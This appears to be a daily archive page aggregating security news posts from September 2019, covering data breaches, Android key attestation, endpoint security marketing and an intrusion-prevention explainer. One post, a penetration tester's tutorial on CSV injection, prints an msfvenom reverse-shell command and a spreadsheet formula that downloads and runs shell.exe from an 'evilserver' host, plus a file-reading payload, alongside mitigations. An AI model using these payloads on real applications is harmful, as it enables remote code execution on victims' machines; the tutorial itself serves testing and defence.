Daily Archives: September 6, 2019

ACSC confirms the public release of BlueKeep exploit

The Australian Signals Directorate’s Australian Cyber Security Centre (ACSC) is aware of the overnight release of a working exploit for the vulnerability known as BlueKeep (CVE-2019-0708). Australian businesses and users of older versions of Windows should update their systems as soon as practically possible, before hackers further refine their tools and tradecraft in order to fully utilise this exploit.

More than 50% of Canadians Affected by Data Breaches

19 million Canadians are estimated to have been affected by data breaches between late 2018 and 2019, slightly more than half the population of the country. 

The news was released by the Office of the Privacy Commissioner of Canada after the passage of the Personal Information and Electronic Documents Act (PIPEDA). Data breach reports have nearly sextupled since PIPEDA went into effect, with 446 incidents between November 2018 and June 2019.

One notable exception to the PIPEDA reporting requirements is Canadian political parties, which are not required to report data breaches, and often compile large amounts of data on voters. 

Hacking or “internal bad actors” account for the majority of the data breaches reported, with unintentional data leaks and the loss or theft of equipment comprising the bulk of the remainder.

Read more here.

The post More than 50% of Canadians Affected by Data Breaches appeared first on Adam Levin.

Attention Facebook Users: Here’s What You Need to Know About the Recent Breach

With over 2.4 billion monthly active users, Facebook is the biggest social network worldwide. And with so many users come tons of data, including some personal information that may now potentially be exposed. According to TechCrunch, a security researcher found an online database exposing 419 million user phone numbers linked to Facebook accounts.

It appears that the exposed server wasn’t password-protected, meaning that anyone with internet access could find the database. This server held records containing a user’s unique Facebook ID and the phone number associated with the account. In some cases, records also revealed the user’s name, gender, and location by country. TechCrunch was able to verify several records in the database by matching a known Facebook user’s phone number with their listed Facebook ID. Additionally, TechCrunch was able to match some phone numbers against Facebook’s password reset feature, which partially reveals a user’s phone number linked to their account.

It’s been over a year since Facebook restricted public access to users’ phone numbers. And although the owner of the database wasn’t found, it was pulled offline after the web host was contacted. Even though there has been no evidence that the Facebook accounts were compromised as a result of this breach, it’s important for users to do everything they can to protect their data. Here are some tips to keep in your cybersecurity arsenal:

  • Change your password. Most people will rotate between the same three passwords for all of their accounts. While this makes it easier to remember your credentials, it also makes it easier for hackers to access more than one of your accounts. Try using a unique password for every one of your accounts or employ a password manager.
  • Enable two-factor authentication. While a strong and unique password is a good first line of defense, enabling app-based two-factor authentication across your accounts will help your cause by providing an added layer of security.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Attention Facebook Users: Here’s What You Need to Know About the Recent Breach appeared first on McAfee Blogs.

Trust but verify attestation with revocation

Posted by Rob Barnes & Shawn Willden, Android Security & Privacy Team
[Cross-posted from the Android Developers Blog]

Billions of people rely on their Android-powered devices to securely store their sensitive information. A vital component of the Android security stack is the key attestation system. Android devices since Android 7.0 are able to generate an attestation certificate that attests to the security properties of the device’s hardware and software. OEMs producing devices with Android 8.0 or higher must install a batch attestation key provided by Google on each device at the time of manufacturing.
These keys might need to be revoked for a number of reasons including accidental disclosure, mishandling, or suspected extraction by an attacker. When this occurs, the affected keys must be immediately revoked to protect users. The security of any Public-Key Infrastructure system depends on the robustness of the key revocation process.
All of the attestation keys issued so far include an extension that embeds a certificate revocation list (CRL) URL in the certificate. We found that the CRL (and online certificate status protocol) system was not flexible enough for our needs. So we set out to replace the revocation system for Android attestation keys with something that is flexible and simple to maintain and use.
Our solution is a single TLS-secured URL (https://android.googleapis.com/attestation/status) that returns a list containing all revoked Android attestation keys. This list is encoded in JSON and follows a strict format defined by JSON schema. Only keys that have non-valid status appear in the list, so it is not an exhaustive list of all issued keys.
This system allows us to express more nuance about the status of a key and the reason for the status. A key can have a status of REVOKED or SUSPENDED, where revoked is permanent and suspended is temporary. The reason for the status is described as either KEY_COMPROMISE, CA_COMPROMISE, SUPERSEDED, or SOFTWARE_FLAW. A complete, up-to-date list of statuses and reasons can be found in the developer documentation.
The CRL URLs embedded in existing batch certificates will continue to operate. Going forward, attestation batch certificates will no longer contain a CRL extension. The status of these legacy certificates will also be included in the attestation status list, so developers can safely switch to using the attestation status list for both current and legacy certificates. An example of how to correctly verify Android attestation keys is included in the Key Attestation sample.

Seeker – Accurately Locate Smartphones using Social Engineering

Seeker – Accurately Locate Smartphones using Social Engineering Locate Smartphones: Seeker comes preinstalled in BlackArch Linux. If you are using Kali Linux, Parrot OS or another Linux based distribution see install information below.   Seeker is developed by thewhiteh4t. Seeker is a Proof of Concept and is for Educational Purposes Only, Seeker shows what data ... Read moreSeeker – Accurately Locate Smartphones using Social Engineering

The post Seeker – Accurately Locate Smartphones using Social Engineering appeared first on HackingVision.

How the California Consumer Privacy Act (CCPA) will affect you and your business | TECH(talk)

The California Consumer Privacy Act (CCPA) is, in some ways, similar to Europe's GDPR. This rule, which goes into effect in 2020, gives individual users more ownership over their own data. Users can even refuse to allow companies to sell their online data. As the compliance deadline approaches, CSO Online contributor Maria Korolov and senior editor Michael Nadeau discuss with Juliet how CCPA may shift business models, change online behavior and reveal where exactly our data has been. Some tech companies, like Google, are even trying to exempt themselves from regulation. Failure to adhere to the rule could be an "extinction level" event.

ST08: Uncovering the opportunity of EDR with Chris Young, Ash Kulkarni, Josh Zelonis, and David Barron

In this exclusive episode featuring McAfee CEO Chris Young, we’re exploring EDR guided investigation and the opportunities it provides for reducing alert noise, maximizing the productivity of cybersecurity teams, and reducing triage and remediation times. Chris is joined by McAfee’s Chief Product Officer Ash Kulkarni, Forrester’s Principal Analyst Josh Zelonis, and GM Financial’s Assistant Vice President of Cybersecurity David Barron, who each provide their unique perspectives on how guided investigation can address the security challenges and needs of today’s enterprises.

The post ST08: Uncovering the opportunity of EDR with Chris Young, Ash Kulkarni, Josh Zelonis, and David Barron appeared first on McAfee Blogs.

Maintaining Effective Endpoint Security 201

Today’s enterprises are faced with unique, modern-day issues. Many are focused on adopting more cloud-based services and reducing infrastructure footprint, all while the number of devices accessing the environment grows. This, in turn, requires security teams to create different levels of access, policies, and controls for users. Plus, as these businesses expand some unexpected security issues may arise, such as alert volume, lack of visibility, complicated management, and longer threat dwell times. To strike a balance between business objectives and a healthy security posture, IT teams can implement some of the tactics we recommended in our Effective Endpoint Security Strategy 101 blog, such as virtual private networks (VPNs), proper employee security training, and machine learning (ML) and artificial intelligence (AI) technology for predictive analysis. But with the threat landscape evolving every day, is there more these organizations can do to sustain an effective endpoint strategy while supporting enterprise expansion? Let’s take a look at how teams can bolster endpoint security strategy.

Managing the Many Vulnerabilities

As enterprises try to keep pace with the number of endpoints, as well as the threats and vulnerabilities that come with these devices, multiple levels of security need to be implemented to maintain and expand a sustainable security posture. One way for enterprise security teams to keep track of these vulnerabilities and threats is through the use of vulnerability management. This process involves the identification, classification, and prioritization of vulnerabilities when flaws arise within a system.

For vulnerability management to be successful, security teams must have full visibility into an endpoint environment. This awareness will help teams proactively mitigate and prevent the future exploitation of vulnerabilities. Plus, with endpoints always evolving and being added, a vulnerability management system is a necessity for expanding effective endpoint security.

Beware of Privilege Escalation

Due to the sheer number of endpoints being introduced to the enterprise environment, the possibility of a vulnerable endpoint increases. And with vulnerable endpoints creating gateways to important enterprise data, cybercriminals often attempt to exploit a bug or flaw in an endpoint system to gain elevated access to sensitive resources. This tactic is known as privilege escalation.

To thwart cybercriminals in their tracks and subvert privilege escalation attacks, security teams can employ the practice of least privilege. In other words, users are granted the least amount of privilege required to complete their job. That way, if hackers manage to get their hands on an exposed endpoint, they won’t be able to gain access to troves of corporate data. The threat of privilege escalation can also be solved through patches and added layers of security solutions at different stages of the endpoint.

Administering Enterprise Access

Who can access specific assets and resources within an enterprise is an important discussion to be had for any endpoint security strategy. Not all users should have access to all resources across the network and if some users are given too much access it can lead to increased exposure. This is where access management comes into play.

Maintaining a secure endpoint environment requires security teams to identify, track, and manage specific, authorized users’ access to a network or application. By creating differentiated levels of access across the board, teams can ensure they are prioritizing key stakeholders while still controlling the number of potential exposure points. Beyond monitoring accessibility, its critical security teams know where data is headed and are able to control the flow of information. The good news? Teams can rely on a solution such as McAfee Data Loss Prevention (DLP) to assist with this, as it can help security staff protect sensitive data on-premises, in the cloud, or at the endpoints.

Coaching Users on Passwords and Identity Management

Passwords are the first defense against cybercriminals. If a cybercriminal guesses a password, they have access to everything on that device – so the more complex and personalized a password is the better. Beyond encouraging complex password creation, it’s crucial security teams make single sign-on (SSO) or multifactor authentication a standard aspect of the user login process. These are easy-to-use tools that users can take advantage of, which help add more protective layers to a device.

Assessing the Risks

 As a security team, assessing the overall risk present in your organization’s current environment is a top priority. From checking for potential cyberthreats to monitoring and evaluating endpoints to ensure there are no exposures – its important teams do their due diligence and conduct a comprehensive risk assessment. Teams need to make risk assessments a routine aspect of their overall security strategy, as new risks are always popping up. To do so in a proper and timely manner, better visibility is required, and teams should get into a habit of red teaming and leveraging automation for response and remediation. McAfee MVISION Endpoint Detection and Response (EDR) can also help teams get ahead of modern threats with AI-guided investigations that surface relevant risks, as well as automate and remove the manual labor of gathering and analyzing evidence.

Once a risk assessment has been done, security teams must take immediate action on the results. After potential threats are identified and analyzed with the help of McAfee MVISION EDR, teams must work to correct any potential negative impact these risks may have on an enterprise, resources, individuals, or the endpoint environment. By leveraging a centralized management tool, enterprise teams can do just that — reducing alert noise, elevating critical events, and speeding up the ability to respond and harden endpoints when risks or areas of exposure are identified.

Utilizing Advanced Security Solutions

To cover all the bases, it is vital teams leverage multiple endpoint security solutions that have proactive technology built-in and are collaborative and integrative. Take McAfee MVISION Endpoint and MVISION Mobile for example, which both have machine learning algorithms and analysis built into their architecture to help monitor and identify malicious behavior. Additionally, McAfee Endpoint Security delivers centrally managed defenses, like machine learning analysis and endpoint detection, to protect systems with multiple, collaborative defense and automated responses.

Advanced security solutions bring an endpoint security strategy full circle. Take the time to research and then invest in technology that is suitable for your enterprise’s needs. Growth does not have to be hindered by security, in fact having the two work in tandem will ensure longevity and stability.

To learn more about effective endpoint security strategy, be sure to follow us @McAfee and @McAfee_Business.

The post Maintaining Effective Endpoint Security 201 appeared first on McAfee Blogs.

Data Extraction to Command Execution CSV Injection

As web applications get more complex and more data driven, the ability to extract data from a web application is becoming more common. I work as a principal penetration tester on Veracode’s MPT team, and the majority of web applications that we test nowadays have the ability to extract data in a CSV format. The most common software installed in corporate environments is Microsoft Excel, and this software has the ability to open CSV files (in most cases, this is the default). It should be noted that this type of attack would also affect LibreOffice as it would also interpret the payload as formula.

Attack Requirements

In order to perform a basic attack, a number of requirements are needed. An attacker needs the ability to inject a payload into the tables within the application. The application needs to allow a victim to download this data into CSV format that can then be opened in Excel. This would cause the payload to be interpreted as an Excel formula and run.

Basic Attack

1. Search the application to find a location where any data input can be extracted.

2. Inject Payload =HYPERLINK(“http://www.veracode.com “, “Click for Report”)

3. Confirm the application is vulnerable to this type of attack. Extract the data and confirm the payload has been injected by opening the CSV file in Microsoft Excel.

4. You can then see a “Click for Report link” in the Excel File. This indicates the payload has been injected correctly.

In this scenario, when the victim clicks on the link, it will take them to the Veracode website. This type of attack might not seem too serious, but consider the following:

Instead of redirecting an end user to the Veracode website, we could redirect the end user to a server we controlled, which contained a clone of the website. We could then ask the victim to authenticate to our clone website, allowing us as the attacker to steal his or her credentials. We could then use these credentials on the original website and have access to all his or her personal information or any functionality the account has access to. There are also a number of other attacks possible with this type of formula injection, including exfiltrating sensitive data, obtaining remote code execution, or even reading the contents of certain files under the right circumstances. We can look at one of these types of attacks below.

Advance Attack – Remote Command Execution

A more advanced attack would use the same method as above but with a different payload, which would lead to remote code execution. This type of attack does depend on a number of factors and might not always be possible. However, it’s still worth considering and also highlights how serious this vulnerability can be under the right circumstances.

Attack in Steps

1. We’ll use a shell.exe file, which can contain whatever we want to execute on the system but, in this scenario, we will use msfvenom to create a reverse Meterpreter payload.

msfvenom -p windows/meterpreter/reverse_tcp  -a x64 --platform Windows LHOST=<IP Address> LPORT=1234 -f exe > shell.exe

2. We also need to set up a listener that will wait for the connect back to us once the shell.exe payload has been executed on the victim’s machine. We will use Metasploit multi/handler for this example. We need to set the LPORT and also make sure the IP address is correct.

3. We also need to host the shell.exe payload so it can be downloaded. For this, I used the following command, python -m SimpleHTTPServer 1337, which will set up a simple web server in the current directory on my system. A real attack might host this on a compromised web server.

4. Once all this has been set up, we could then inject the payload into the application and wait for a victim to download the CSV file and click on the cell with the payload in it.

=cmd|' /C powershell Invoke-WebRequest "http://evilserver:1337/shell.exe"

-OutFile "$env:Temp\shell.exe"; Start-Process "$env:Temp\shell.exe"'!A1

Breakdown of Payload

  • The first line is calling cmd, which gets passed to the PowerShell Invoke-WebRequest to download a shell.exe file from our evilserver on port 1337. Note that if the host is running PowerShell version 2, the Invoke-WebRequest won’t work.
  • The next line is saving the shell.exe file into the temp directory. The reason we use the temp directory is because it’s a folder anyone can write to.
  • We then start a process to execute the downloaded shell.exe payload.

5. Once the victim opens the file, the CSV injection payload would run. However, it may present a “Remote Data Not Accessible” warning. The chances are that most victims would think the file has come from a legitimate source and so they need to select yes to view the data. It should also be noted that in this scenario the Excel file is empty apart from our payload. In a real-world attack, the Excel file would be populated with information from the application.

6. Once the victim selects yes, within a few moments, Metasploit will get a reverse connect from the victim’s host.

7. At this point, the attacker can perform a number of tasks depending on the level of access he or she has obtained. This includes, but is not limited to, stealing passwords in memory, attacking other systems in the network (if this host is connected to a network), taking over uses’ webcams, etc. In fact, under the right circumstances, it would be possible to compromise an entire domain using this attack.

When testing for CSV injections, in most instances, a tester will use a simple payload. This is due to a number of reasons. It’s not uncommon for a tester to demonstrate this type of attack by using a Hyperlink payload like the one above, or a simple cmd payload like the following =cmd|’/C cmd.exe ’!’A.

Some might also use the following payload depending on the operating system: ='file://etc/passwd'#$passwd.A1

This would read the first line within the etc/passwd file on a Linux system.

Mitigating the Risk

The best way to mitigate against this type of attack is to make sure all users’ inputs are filtered so only expected characters are allowed. Client-supplied inputs should always be considered unsafe and treated with caution when processing. CSV injection is a side effect of bad input validation, and other types of web attacks are due to weak input validation. To mitigate against CSV injections, a default-deny regular expression or “whitelist” regular expression should be used to filter all data that is submitted to the application. Because Excel and CSV files utilize equals signs (=), plus signs (+), minus signs (-), and “At” symbols (@) to denote formulas, we recommend filtering these out to ensure no cells begin with these characters. Any element that could appear in a report could be a target for Excel / CSV injections and should be further validated for CSV injection.

In summary, CSV injection is not a new attack vector, but it’s one that developers often forget about. As more web applications have the ability to extract data, it’s one that could have serious consequences if steps are not taken to mitigate the risk it poses. In addition, developers should be checking user input for other types of attacks like XSS.


This Week in Security News: New Zero-Day Vulnerability Findings and Mobile Phishing Scams

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn how music festival goers need to be on guard for phishing attacks when trying to find a lost iPhone. Also, read how Trend Micro researchers went public with their findings on a zero-day vulnerability impacting the Android mobile operating system. 

Read on:

Finding a Better Route to Router and Home Network Security

New research published reveals that many of the home routers sold in the US today are still missing basic protections. Read on to learn about how your router is exposed to hackers, what attacks are possible and how to protect your router and smart home with Trend Micro’s help.

Hiding in Plain Text: Jenkins Plugin Vulnerabilities

Jenkins, a widely used open-source automation server that allows DevOps developers to build, test, and deploy software efficiently and reliably, recently published security advisories that included problems associated with plain-text-stored credentials. Vulnerabilities that affect Jenkins plugins can be exploited to siphon off sensitive user credentials.

Big Tech Companies Meeting with U.S. Officials on 2020 Election Security

Facebook, Google, Twitter and Microsoft met with government officials in Silicon Valley on Wednesday to discuss and coordinate on how best to help secure the 2020 American election, kicking off what is likely to be a marathon effort to prevent the kind of foreign interference that roiled the 2016 election.

Glupteba Campaign Hits Network Routers and Updates C&C Servers with Data from Bitcoin Transactions

Trend Micro recently caught a malvertising attack distributing the malware Glupteba, an older malware that was previously connected to a campaign named Operation Windigo and distributed through exploit kits to Windows users. This blog discusses features of this malware and security recommendations to avoid this kind of attack.

Spam Campaign Abuses PHP Functions for Persistence, Uses Compromised Devices for Evasion and Intrusion

A Trend Micro honeypot detected a spam campaign that uses compromised devices to attack vulnerable web servers. After brute-forcing devices with weak access credentials, the attackers use them as proxies to forward a base64-encoded PHP script to web servers, which then sends an email with an embedded link to a scam site to specific email addresses.

Google, Trend Micro, IBM’s Red Hat ID’d Among Top Container Security Vendors

Container security presents a hot growth opportunity for the channel, with the global market expected to more than quadruple by 2024, reaching nearly $2.2 billion. North America is expected to account for the highest market share through 2024.

IPhone Theft Leads to Stolen Apple Credentials Through Phishing Attack

Of the hundreds who had their cellphones stolen or lost during the Lollapalooza music festival, one woman’s attempt to find her iPhone led her to a phishing scheme that stole her credentials. Like a regular phishing scheme, she received a seemingly legitimate text message with a link to what looked like the Find My iPhone webpage, but realized they were fake after she entered her credentials.

Ransomware Attacks Hit Taiwan Hospitals and Dubai Firm

Two notable ransomware attacks targeted several hospitals in Taiwan and a contracting company in Dubai last week. The ransomware attack in Taiwan prevented several hospitals from accessing their information systems, while the attack in Dubai froze a company’s systems.

Trend Micro, AWS Deliver Transparent, Inline Network Security for Enterprise Clouds

Trend Micro is taking new steps to help enterprises using Amazon Web Services to better deliver network security for cloud and hybrid operations.  IDN looks at Trend Micro Cloud Network Protection, along with the firm’s new XDR solution.

Sextortion Scheme Deployed by ChaosCC Hacker Group Demands US$700 in Bitcoin

A recently discovered email scheme reportedly deployed by a hacking group called ChaosCC claims to have hijacked recipients’ computers and recorded videos of them while watching adult content. This sextortion scheme reportedly attempts to trick recipients into paying US$700 in bitcoin.

Unusual CEO Fraud via Deepfake Audio Steals US$243,000 From U.K. Company

This fraud incident used a deepfake audio, an artificial intelligence (AI)-generated audio, and was reported to have conned US$243,000 from a U.K.-based energy company. According to a report, in March, the fraudsters used a voice-generating AI software to mimic the voice of the chief executive of the company’s Germany-based parent company to facilitate an illegal fund transfer. 

Zero-Day Disclosed in Android OS

Yesterday, Trend Micro researchers went public with their findings on a zero-day vulnerability impacting the Android mobile operating system after Google published the September 2019 Android Security Bulletin, which didn’t include a fix for their bug. The vulnerability resides in how the Video for Linux (V4L2) driver that’s included with the Android OS handles input data.

Container Security in Six Steps

Containers optimize the developer experience. However, as with any technology, there can be tradeoffs in using containers. This blog contains sex steps developers can follow to minimize risks when building in containers.

Are you well-versed on Trend’s suggestions for protecting your router and smart home from hackers? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: New Zero-Day Vulnerability Findings and Mobile Phishing Scams appeared first on .

SECURITY ALERT: Massive Data Leak Revealed the Sensitive Information of Millions of People

The web surfing history of millions of people was intercepted yesterday in a huge data leak. Large Swedish companies, such as Volvo, SAS, Ericsson, Husqvarna, and SKF have been affected, as originally reported by the Swedish newspaper Dagens Nyheter. About 40,000 people involved in the cyber incident allegedly are Swedes.

Spyware in Browser Extensions Enabled the Attack

The data spill was caused due to a spy code installed in Chrome and Firefox add-ons, which allowed the browsing history of millions of users to be harvested and sold.

A part of the leaked data comes from some of the largest organizations in Sweden. The database contained information such as discussions between employees, downloaded files, and internal confidential information. More precisely, it was possible to see exactly what people did online and although the information was considered to be anonymous, their identity could be confirmed.

The Failure of a SpaceX Rocket Engine Was Also Leaked

According to security engineer Sam Jadali, other major international companies have been involved as well. For instance, information from the space company SpaceX regarding the failure of a rocket engine was revealed. The vehicle was used to transport astronauts to and from the International Space Station (ISS).

The Company Behind the Data Leak

The information was collected and sold by Nacho Analytics, which is ending its activity now that the leak has been brought to light.

This is the pop-up message that is currently being displayed on their website:

“Nacho Analytics is closing all remaining accounts, and sending refunds to our existing customers for their recent payments. It will take a few days to work through this process. We appreciate your patience. If you are an active customer, please check your email for more detailed information.

Our limited site is active to offer customer support during this transition.”

nacho analytics data leak september 2019

Browsing habits are a method of studying customer patterns and monitoring competitors. This leak is similar to the one we’ve seen in the Cambridge Analytica scandal, which could abuse Facebook data to be used in political campaigns, writes SVT.

Why Did the Data Leak Happen?

The reason is that many companies use browser-based tools. And if an employee accesses a browser extension compromised by spyware, the activity within the tool can also be intercepted by cybercriminals.

Our CEO, Morten Kjaersgaard, has spoken with IT-Kanalen about how serious the problem is.

In his view, the issue seems to be greater than we realize. Specifically, any extension could be used by cybercriminals to access sensitive data. The reason is that these add-ons are not part of a company’s internal system, but developed by third parties. When users install a plugin in a browser, a port opens to the underlying engine – in this case, Chrome or Firefox – where it gets access to data other than it should have access to.

On a more positive note, the issue was discovered early, and this way we can get the chance to better understand it and find solutions. We should somehow be glad that the attack did not hit IE, which is more commonly used because this way the damage would probably have been significantly higher, says Morten Kjaersgaard.

How can we reduce the risks?

The simple answer would be to disable all plugins. But since this is rarely a viable solution, here are the recommendations for companies and consumers.

Advice for Companies

Companies should follow several steps. First of all, their IT department should design some form of policy-based system for deciding which add-ons should be installed and also know how they should be handled and monitored. There are existing solutions that are partially already integrated into Chrome.

Secondly, traffic should be monitored in real-time. This way, companies can detect early on whether systems connect and send data to suspicious locations. If this practice is combined with DNS protection and IP filtering, then you will have a great security foundation for your company.

Advice for Consumers

The most obvious recommendation would be not to install any extensions. But if you need to do it, always make sure you only have installed a few add-ons that you really depend on. What’s more, browser extensions should come from trusted, reputable sources and not from any unknown sites or companies.

By using DNS and IP filtering in combination with traffic monitoring and firewalls, both consumers and companies will play their part in the fight against cybercriminals. And this is something that we must all start with as soon as possible, Morten Kjaersgaard concludes.

Swedish speakers can read the full interview with Morten Kjaersgaard, Heimdal Security’s CEO, here.

Does your company need a cybersecurity solution to prevent Spyware and the most advanced types of malware?

Get in touch today to learn how we can help you.


The post SECURITY ALERT: Massive Data Leak Revealed the Sensitive Information of Millions of People appeared first on Heimdal Security Blog.

Cyber News Rundown: Deepfake Voice Fraud

Reading Time: ~ 2 min.

Deepfake BEC Scam 

A new variant of the well-known BEC scam has implemented a feature that has yet to be used in an email scam: voice fraud. Using an extremely accurate deepfake voice of a company’s CEO, scammers were able to successfully convince another company to wire $250,000 with the promise of a quick return. Unfortunately, that transfer was quickly spread out through a number of countries, leaving investigators with very little clue as to the identity of the scammers.  

Yves Rocher Data Leak 

The customer databases belonging to French retailer Yves Rocher were found to be publicly available by researchers who discovered the records of over 2.5 million customers. In addition to the personal data, the details for over 6 million transactions, and internal Yves Rocher information were grouped with the exposed database. The internal data could be a major opportunity for any competitors to obtain some crucial footings in the marketplace.  

German Mastercard Breach 

Officials recently learned of a data breach that was affecting nearly 90,000 German Mastercard holders that are part of their members loyalty program. Nearly half of the exposed email addresses have already been compromised in previous data breaches, according to Have I Been Pwned, though the affected customers should still update their credentials. Fortunately, this breach only affected the loyalty program members rather than the entirety of Mastercard’s world-wide client base.  

Ransomware Wave Hits US 

Continuing on from a summer full of ransomware attacks on US cities comes a streak of 13 new attacks that range from the East Coast to the West Coast. Sadly, several of the victims have already paid out some portion of the demanded ransoms, with some insurance companies even attempting to negotiate with the attackers for a lower payout. With this streak, the total number of ransomware attacks in the US in 2019 is up to 149, 20% of which involved educational institutions.   

UK Travel Agency Breach 

A UK-based travel agency has recently fallen victim to a data breach that could affect over 200,000 of their customers. The main leak included audio files for the affected customers confirming travel and payment plans, as the travel firm completes their deals over the phone. The audio files appear to have bene publicly available for a span of nearly 3 years, but quickly secured the sensitive information once they were informed of its current status.  

The post Cyber News Rundown: Deepfake Voice Fraud appeared first on Webroot Blog.

Guardian investigations: how tech helps tackle big data … and big lawyers

Our head of investigations explains how a new IT system, Giant, has the power to find needles in journalistic haystacks

There aren’t too many places to hide at the Guardian. The offices are open-plan and most of the meeting rooms have glass walls.

There is one room, however, that has a special status. In recent years, when we have been involved in big investigations, this is the place where reporters and editors have relocated for months on end.

Continue reading...

Unalaska Recovers $2.3 Million Following Phishing Attack

The Alaskan city of Unalaska has recovered approximately $2.3 million after digital fraudsters targeted it with a phishing attack. Erin Reinders, city manager of Unalaska, revealed that the municipality had recovered $2,347,544.43 on 22 August. That amount constituted a large part of the $2,985,406.10 total which the City had sent to scammers. Per Reinders’ comments, […]… Read More

The post Unalaska Recovers $2.3 Million Following Phishing Attack appeared first on The State of Security.

What Is an Intrusion Prevention System?

When you need a tool to find and detect malicious activity within a network, an intrusion prevention system (IPS) fills that role. They first detect any malicious activities in the network, create a report on the information, and try to block or stop it from further operating.

An intrusion prevention system expands the capabilities of an intrusion detection system (IDS), which monitors network and systems traffic. The advantage of an IPS over an IDS is the fact that these are found in-line, at the path of the source and the destination, and can block malicious activities from occurring in the network.

How Do Intrusion Prevention Systems Work?

Usually found behind a firewall, an intrusion prevention system functions as an additional layer of filtering for malicious activities. If something gets through the firewall, the IPS is there to catch it. They are capable of analyzing and taking action on network traffic. Actions include sending out alerts to admins, dropping potentially dangerous packets, stopping traffic from a source of malicious activities, and even restarting connections.

It is important to note, however, that an IPS should be efficient so it does not hinder the performance of a network. At the same time, the intrusion prevention system should be able to act quickly and accurately to catch malicious activities in real time and detect false positives.

How an Intrusion Prevention System Detects Malicious Activities

There are several ways that an intrusion prevention system can find and detect malicious activities. The two main methods are statistical anomaly-based detection and signature-based detection.

Signature-based detection involves using a dictionary of identifiable signatures, located in the code of an exploit. This can be categorized further to two more methods: vulnerability-facing and exploit-facing. The first detects malicious activities based on specific network vulnerabilities, while the second one checks for common attack patterns.

For statistical anomaly-based detection, intrusion prevention systems use random samples of network traffic, then compare them to predetermined baseline performance levels. If something is off, it will then send out an alert or take action.

Comparing Intrusion Prevention Systems

There are four common types of an intrusion prevention system. First is the network-based intrusion prevention system, which has the ability to check and monitor the entire network to look for suspicious activities based on protocol activity.

A wireless intrusion prevention system, on the other hand, checks wireless security protocols to catch anomalies and suspicious activities.

Network behavior analysis checks the network traffic flow for unusual activities such as a spike in traffic or anything that may seem different, like a DDoS attack.

The final common type is the host-based intrusion prevention system, which is an installed software that checks a single host for suspicious activities.

Which Intrusion Prevention System to Use?

There are many offerings when it comes to intrusion prevention system. To help choose the best one, it is best to set a budget first, define the requirements of your network, and then research the different systems available in the market to see if they fit what you need.

Remember, an intrusion prevention system is not a comprehensive security solution. While it can be a valuable asset in any organization’s security to detect malicious activities, other tools are needed for endpoint security, data protection, incident responses, and more.

Also Read,

The Highly Competitive Web Application Firewall Market

On Firewalls and Their Role in Enterprise Security

What is the Difference between a Firewall, Router & Secure Web Gateway

The post What Is an Intrusion Prevention System? appeared first on .